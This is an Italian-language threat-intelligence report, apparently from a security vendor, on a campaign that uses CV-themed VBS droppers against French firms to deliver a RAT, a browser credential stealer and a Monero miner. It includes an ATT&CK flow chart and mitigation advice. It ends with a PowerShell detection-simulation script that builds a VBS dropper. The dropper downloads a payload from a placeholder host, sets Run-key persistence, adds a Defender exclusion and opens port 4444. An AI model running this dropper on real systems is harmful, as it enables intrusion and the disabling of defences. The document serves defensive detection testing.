Analisi di FAUX#ELEVATE: Attori di Minaccia Puntano alla Francia con Esca CV per Distribuire Crypto Miners e Infostealer che Puntano agli Ambienti Enterprise

Ruslan Mikhalov Capo della Ricerca sulle Minacce presso SOC Prime

Segui

Analisi di FAUX#ELEVATE: Attori di Minaccia Puntano alla Francia con Esca CV per Distribuire Crypto Miners e Infostealer che Puntano agli Ambienti Enterprise

Detection stack

AIDR
Alert
ETL
Query

Rapporto
Flusso di Attacco
Rilevamenti
Simulazioni

Riepilogo

Un’operazione di cybercriminalità sfrutta un file di curriculum VBS malevolo per colpire ambienti aziendali francofoni. Il dropper è altamente offuscato ed è progettato per essere eseguito solo su macchine joinate al dominio, dove distribuisce malware per il furto di credenziali insieme a un miner di Monero. La campagna utilizza servizi fidati come Dropbox e siti WordPress compromessi in Marocco per ospitare i payload. I dati rubati vengono esfiltrati tramite SMTP a mail.ru, e il malware rimuove le tracce dopo l’esecuzione per ridurre la visibilità forense.

Indagine

I ricercatori hanno ingegnerizzato al contrario il dropper VBS, scoperto i suoi controlli ambientali e mappato l’intera catena d’infezione multi-stadio, inclusa l’estrazione con 7-Zip, un RAT personalizzato chiamato RuntimeHost.exe, il furto delle credenziali del browser ChromElevator e l’attività di mining XMRig. Hanno anche identificato l’infrastruttura di supporto come indirizzi IP, voci DNS dinamiche e server WordPress compromessi. La persistenza era collegata a chiavi Run del registro e a un’attività pianificata nascosta.

Mitigazione

I difensori dovrebbero bloccare file VBS sospetti e applicare controlli rigidi sugli allegati email. Il monitoraggio dovrebbe concentrarsi sull’esecuzione anomala di wscript.exe, comandi PowerShell che aggiungono esclusioni in Defender e modifiche al registro che influenzano EnableLUA. Le organizzazioni dovrebbero limitare l’SMTP in uscita da applicazioni non di posta e osservare le connessioni alle infrastrutture note di Dropbox e mining-pool. Qualsiasi chiave di registro o attività pianificata identificata dovrebbe essere rimossa o messa in quarantena.

Risposta

I team di sicurezza dovrebbero rilevare la creazione delle chiavi Run “Microsoft Media Service” e “z_MicrosoftEdgeAutoLaunch_2EDFBF”, insieme al compito pianificato nascosto “MicrosoftUpdateService”. Gli allarmi dovrebbero attivarsi sui processi wscript.exe che si collegano a Dropbox o ai domini WordPress documentati. I file malevoli devono essere messi in quarantena, l’host isolato e le credenziali del browser esposte resettate. Una revisione forense dovrebbe poi determinare se i dati rubati sono stati esfiltrati tramite mail.ru.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Node definitions step_phishing["Tecnica – T1566.001 Phishing: Spearphishing Attachment Descrizione: Email con allegato malevolo che, quando aperto, consegna il payload iniziale."] class step_phishing action step_user_execute["Tecnica – T1204.002 Esecuzione Utente: File Malevolo Descrizione: La vittima esegue il file VBS allegato, attivando il dropper."] class step_user_execute action step_dropper["Tecnica – T1059.005 Visual Basic (VBScript) Tecnica – T1027 File o Informazioni Offuscati Descrizione: Script VBS offuscato agisce come un dropper che estrae componenti aggiuntivi."] class step_dropper action step_domain_check["Tecnica – T1069.002 Scoperta di Gruppi di Permessi: Dominio Descrizione: Verifica se il host è collegato a un dominio per adattare il comportamento."] class step_domain_check technique step_uac_bypass["Tecnica – T1548.002 Bypass Controllo Account Utente Tecnica – T1562.001 Prevenzione: Disabilitare Strumenti di Sicurezza Tecnica – T1564.012 Nascondere Artefatti: Esclusioni Defender Descrizione: Eleva i privilegi, disabilita le difese e aggiunge esclusioni."] class step_uac_bypass technique step_download["Tecnica – T1102 Servizio Web Tecnica – T1102.001 Risolutore Dead Drop Descrizione: Recupera payload aggiuntivi da Dropbox o posizioni web."] class step_download technique step_deploy_toolkit["Strumento – RuntimeHost.exe, XMRig Miner, Ricettatori di Browser Descrizione: Distribuisce componenti per mining, furto di credenziali e ulteriori sfruttamenti."] class step_deploy_toolkit tool step_cred_access["Tecnica – T1555.003 Credenziali dai Browser Web Descrizione: Estrae password e cookie del browser memorizzati."] class step_cred_access technique step_collect_files["Tecnica – T1005 Dati dal Sistema Locale Descrizione: Raccoglie file dal desktop dell’utente per l’esfiltrazione."] class step_collect_files technique step_exfiltration["Tecnica – T1048.002 Esfiltrazione Tramite Protocollo In Cifrato Non C2: SMTP Tecnica – T1071.003 Protocolli Web: Mail Protocols Descrizione: Invia i dati raccolti tramite SMTP cifrato."] class step_exfiltration technique step_resource_hijack["Tecnica – T1496 Appropriazione di Risorse Descrizione: Usa XMRig per minare criptovalute sull’host della vittima."] class step_resource_hijack technique step_process_injection["Tecnica – T1055 Iniezione di Processo Descrizione: Inietta codice malevolo in explorer.exe per nascondere l’attività."] class step_process_injection technique step_c2["Tecnica – T1102 Servizio Web (HTTPS/Dynamic DNS) Descrizione: Mantiene il controllo di comando su traffico web cifrato e porte personalizzate."] class step_c2 technique step_persistence["Tecnica – T1547.001 Chiavi Run di Registro / Cartella di Avvio Tecnica – T1053 Attività Pianificata/Job (Nascosto) Descrizione: Stabilisce la persistenza tramite chiave Run e un’attività pianificata nascosta."] class step_persistence technique step_cleanup["Tecnica – T1070.004 Cancellazione di File Descrizione: Rimuove artefatti e log per evitare il rilevamento."] class step_cleanup technique %% Edge connections step_phishing –>|conduce_a| step_user_execute step_user_execute –>|conduce_a| step_dropper step_dropper –>|conduce_a| step_domain_check step_domain_check –>|conduce_a| step_uac_bypass step_uac_bypass –>|conduce_a| step_download step_download –>|conduce_a| step_deploy_toolkit step_deploy_toolkit –>|abilita| step_cred_access step_deploy_toolkit –>|abilita| step_collect_files step_cred_access –>|combinato_con| step_collect_files step_cred_access –>|supporta| step_exfiltration step_collect_files –>|supporta| step_exfiltration step_deploy_toolkit –>|abilita| step_resource_hijack step_deploy_toolkit –>|abilita| step_process_injection step_process_injection –>|fornisce| step_c2 step_c2 –>|usato_da| step_exfiltration step_deploy_toolkit –>|stabilisce| step_persistence step_persistence –>|seguito_da| step_cleanup step_exfiltration –>|seguito_da| step_cleanup "

Attacco Flow

Narrazione Attacco & Comandi:
1. Fase 1 – Rilasciare VBS malevolo: L’attaccante scrive un dropper VBS che scarica un payload di secondo stadio e scrive una chiave run del registro per la persistenza.
2. Fase 2 – Eseguire VBS tramite wscript.exe con PowerShell come processo genitore, soddisfacendo così la condizione di rilevamento genitore-figlio.
3. Fase 3 – All’interno del VBS, invocare PowerShell per aggiungere un’esclusione di Microsoft Defender (T1562.001) e Netsh per aprire la porta TCP in entrata 4444 (T1562.004) per il C2.
4. Fase 4 – Pulire le prove dopo il successo.

Script Test di Regressione: (PowerShell – contenuto autonomo; eseguire con diritti amministrativi)

# -----------------------------------------------------------------------
# Simulazione Dropper VBS Maligni – attiva la regola Sigma:
#   Image == "*wscript.exe" AND ParentImage in ("*powershell.exe","*netsh.exe")
# -----------------------------------------------------------------------

$vbsPath = "$env:Tempmalicious_dropper.vbs"
$payloadUrl = "http://example.com/payload.exe"   # URL segnaposto
$payloadPath = "$env:Temppayload.exe"

# 1. Creare un VBS maligno che:
#    • Scarica un payload
#    • Scrive una chiave Run per persistenza
#    • Chiama PowerShell per aggiungere esclusione Defender
#    • Chiama Netsh per aprire una regola firewall
$vbsContent = @"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "GET", "$payloadUrl", False
objXML.Send
If objXML.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1
objStream.Open
objStream.Write objXML.ResponseBody
objStream.SaveToFile "$payloadPath", 2
End If

‘ Persist via Run key Set objShell = CreateObject(“WScript.Shell”) objShell.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious”, “$payloadPath”

‘ Defender exclusion via PowerShell (executed inline) objShell.Run “powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'“”, 0, True

‘ Open firewall port 4444 via Netsh (executed inline) objShell.Run “netsh.exe advfirewall firewall add rule name="MaliciousPort” dir=in action=allow protocol=TCP localport=4444″, 0, True “@

Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Lanciare il VBS con PowerShell come processo genitore
Write-Host "[*] Avviando VBS malevolo tramite wscript.exe (genitore: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait

# 3. Verificare che la regola firewall sia stata aggiunta (opzionale)
netsh advfirewall firewall show rule name=MaliciousPort

# 4. Ripulire gli artefatti (payload & VBS) – lasciato per sezione di pulizia separata
Write-Host "[+] Simulazione completata. Rivedere gli allarmi nel SIEM."

Comandi di Pulizia: (eseguire dopo la verifica)

# Rimuovere la regola firewall
netsh advfirewall firewall delete rule name="MaliciousPort"

# Rimuovere l'esclusione Defender
powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'"

# Cancellare la chiave Run di persistenza
reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f

# Eliminare i file
Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force
Remove-Item -Path "$env:Temppayload.exe" -Force

Write-Host "[+] Pulizia completata."

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis